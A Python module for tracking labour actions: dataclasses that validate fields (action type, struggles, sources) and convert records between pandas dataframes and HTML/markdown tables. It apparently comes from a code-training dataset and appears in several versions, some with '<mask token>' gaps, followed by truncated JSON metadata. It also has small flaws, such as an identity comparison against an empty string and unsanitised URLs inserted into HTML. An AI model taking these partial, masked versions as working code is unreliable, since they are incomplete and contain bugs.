assert struggle in self._valid_struggles, f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
for source in self.sources:
assert BeautifulSoup(source, 'html.parser'
).a is not None or urlparse(source
).netloc is not '', f"'{source}' is in valid. source must be a valid url or an html link tag element"
self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if
'href' in source else source) for source in self.sources]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) ->Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.
items()}
def render_df(self, field: str) ->str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ['date', 'workers']:
return str(value)
elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'
]:
return str(value).strip('[').strip(']').replace("'", '').replace(
'"', '')
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
@classmethod
def create_from_md(cls, table: bs4.element.Tag) ->'Action':
""" Create an Action instance from a md table. """
a = {}
trs = table.find_all('tr')
for key, val in table.attrs.items():
if key != 'class':
a[key] = val
for i, tr in enumerate(trs):
td_key = tr.find('td', class_='field-key')
td_val = tr.find('td', class_='field-value')
val = ''.join(str(e) for e in td_val.contents).strip()
key = ''.join(str(e) for e in td_key.contents).strip()
a[key] = val
return cls(**a)
@classmethod
def create_from_row(cls, row: pd.Series) ->'Action':
""" Create an Action instance from a dataframe row. """
fields = [key for key, value in cls.__dataclass_fields__.items() if
value.type != ClassVar]
d = {key: value for key, value in row.to_dict().items() if key in
fields}
return cls(**d)
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
<|reserved_special_token_1|>
import pandas as pd
import math
import json
import html
import bs4
import re
import dateparser
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from datetime import datetime
from typing import Any, List, Dict, ClassVar, Union
from urllib.parse import urlparse
from .markdown import MarkdownData, MarkdownDocument
Url = str
@dataclass
class Action:
""" The class for an action we want to track.
This class is used to manage the data of an individual Action. It is used
to perform the following:
- set mandatory/optional fields
- set meta fields
- cast an validate data so that it knows how to read datafields from
markdown and dataframes
- output actions as for dataframes and markdown
- create and populate action instances from markdown and dataframes
"""
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ["author"]
_valid_struggles: ClassVar = [
"ethics",
"pay_and_benefits",
"working_conditions",
"discrimination",
"unfair_labor_practices",
"job_security",
]
_valid_actions: ClassVar = [
"strike",
"protest",
"open_letter",
"legal_action",
"union_drive",
"union_representation",
]
@staticmethod
def is_none(field: Any) -> bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == "none":
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
def listify(self, field: Union[List[Any], Any]) -> List[Any]:
if self.is_none(field):
return None
else:
if isinstance(field, (list,)):
return field
else:
return [s.strip().lower() for s in field.split(",")]
def __post_init__(self):
""" Used to validate fields. """
# self.date = datetime.strptime(self.date, "%Y-%m-%d").date()
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers)
# make sure action is a valid action
assert (
self.action in self._valid_actions
), f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
# make sure all struggles are valid struggles
for struggle in self.struggles:
assert (
struggle in self._valid_struggles
), f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
# make sure source is either a url or a html link tag <a>
for source in self.sources:
assert (
BeautifulSoup(source, "html.parser").a is not None
or urlparse(source).netloc is not ""
), f"'{source}' is in valid. source must be a valid url or an html link tag element"
# if html, extract only href from sources
self.sources = [
BeautifulSoup(source, "html.parser").a["href"]
if "href" in source
else source
for source in self.sources
]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) -> Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.items()}
def render_df(self, field: str) -> str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ["date", "workers"]:
return str(value)
elif field in ["locations", "struggles", "companies", "tags", "sources"]:
return str(value).strip("[").strip("]").replace("'", "").replace('"', "")
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) -> str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert (
field in self.__dataclass_fields__
), f"Cannot serialize {field}. Not a valid field in Action."
value = self.__getattribute__(field)
if field in ["date", "workers"]:
td.string = str(value)
elif field in ["locations", "struggles", "companies", "tags"]:
td.string = (
str(value).strip("[").strip("]").replace("'", "").replace('"', "")
)
elif field == "sources":
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(", ".join(ret)), "html.parser"))
else:
td.string = value
return td
@classmethod
def create_from_md(cls, table: bs4.element.Tag) -> "Action":
""" Create an Action instance from a md table. """
a = {}
trs = table.find_all("tr")
for key, val in table.attrs.items():
if key != "class":
a[key] = val
for i, tr in enumerate(trs):
td_key = tr.find("td", class_="field-key")
td_val = tr.find("td", class_="field-value")
val = "".join(str(e) for e in td_val.contents).strip()
key = "".join(str(e) for e in td_key.contents).strip()
a[key] = val
return cls(**a)
@classmethod
def create_from_row(cls, row: pd.Series) -> "Action":
""" Create an Action instance from a dataframe row. """
fields = [
key
for key, value in cls.__dataclass_fields__.items()
if value.type != ClassVar
]
d = {key: value for key, value in row.to_dict().items() if key in fields}
return cls(**d)
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = "actions"
actions: List[Action] = field(default_factory=lambda: [])
fields: List[str] = field(
default_factory=lambda: [
key
for key, value in Action.__dataclass_fields__.items()
if value.type != ClassVar
]
)
def __len__(self) -> int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) -> "Actions":
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) -> pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient="list")
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f"<div id={self.action_id}></div>", "html.parser")
for action in self.actions:
table = soup.new_tag("table")
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag("tr")
td_key = soup.new_tag("td", attrs={"class": "field-key"})
td_val = soup.new_tag("td", attrs={"class": "field-value"})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) -> "Actions":
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(fr'<div id="{cls.action_id}">+[\s\S]+<\/div>', md_doc)
assert len(md_data) == 1, f"multiple divs with id={cls.action_id} were found"
md_data = md_data[0]
soup = BeautifulSoup(md_data, "html.parser")
tables = soup.div.find_all("table")
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) -> "Actions":
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
|
flexible
|
{
"blob_id": "4d0f612c74dc175766f489580fc4a492e1bfd085",
"index": 4345,
"step-1": "<mask token>\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-2": "<mask token>\n\n\n@dataclass\nclass Action:\n <mask token>\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n <mask token>\n <mask token>\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-3": "<mask token>\n\n\n@dataclass\nclass Action:\n <mask token>\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n <mask token>\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n self.workers = None if self.is_none(self.workers) else int(self.workers\n )\n assert self.action in self._valid_actions, f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n for struggle in self.struggles:\n assert struggle in self._valid_struggles, f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n for source in self.sources:\n assert BeautifulSoup(source, 'html.parser'\n ).a is not None or urlparse(source\n ).netloc is not '', f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if \n 'href' in source else source) for source in self.sources]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. \"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) ->Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.\n items()}\n\n def render_df(self, field: str) ->str:\n \"\"\" Return the value of the field rendered for df. \"\"\"\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n return str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'\n ]:\n return str(value).strip('[').strip(']').replace(\"'\", '').replace(\n '\"', '')\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n <mask token>\n\n @classmethod\n def create_from_row(cls, row: pd.Series) ->'Action':\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [key for key, value in cls.__dataclass_fields__.items() if\n value.type != ClassVar]\n d = {key: value for key, value in row.to_dict().items() if key in\n fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-4": "<mask token>\nUrl = str\n\n\n@dataclass\nclass Action:\n \"\"\" The class for an action we want to track.\n\n This class is used to manage the data of an individual Action. It is used\n to perform the following:\n - set mandatory/optional fields\n - set meta fields\n - cast an validate data so that it knows how to read datafields from\n markdown and dataframes\n - output actions as for dataframes and markdown\n - create and populate action instances from markdown and dataframes\n \"\"\"\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n\n def listify(self, field: Union[List[Any], Any]) ->List[Any]:\n if self.is_none(field):\n return None\n elif isinstance(field, (list,)):\n return field\n else:\n return [s.strip().lower() for s in field.split(',')]\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n self.workers = None if self.is_none(self.workers) else int(self.workers\n )\n assert self.action in self._valid_actions, f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n for struggle in self.struggles:\n assert struggle in self._valid_struggles, f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n for source in self.sources:\n assert BeautifulSoup(source, 'html.parser'\n ).a is not None or urlparse(source\n ).netloc is not '', f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if \n 'href' in source else source) for source in self.sources]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. \"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) ->Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.\n items()}\n\n def render_df(self, field: str) ->str:\n \"\"\" Return the value of the field rendered for df. \"\"\"\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n return str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'\n ]:\n return str(value).strip('[').strip(']').replace(\"'\", '').replace(\n '\"', '')\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n\n @classmethod\n def create_from_md(cls, table: bs4.element.Tag) ->'Action':\n \"\"\" Create an Action instance from a md table. \"\"\"\n a = {}\n trs = table.find_all('tr')\n for key, val in table.attrs.items():\n if key != 'class':\n a[key] = val\n for i, tr in enumerate(trs):\n td_key = tr.find('td', class_='field-key')\n td_val = tr.find('td', class_='field-value')\n val = ''.join(str(e) for e in td_val.contents).strip()\n key = ''.join(str(e) for e in td_key.contents).strip()\n a[key] = val\n return cls(**a)\n\n @classmethod\n def create_from_row(cls, row: pd.Series) ->'Action':\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [key for key, value in cls.__dataclass_fields__.items() if\n value.type != ClassVar]\n d = {key: value for key, value in row.to_dict().items() if key in\n fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, 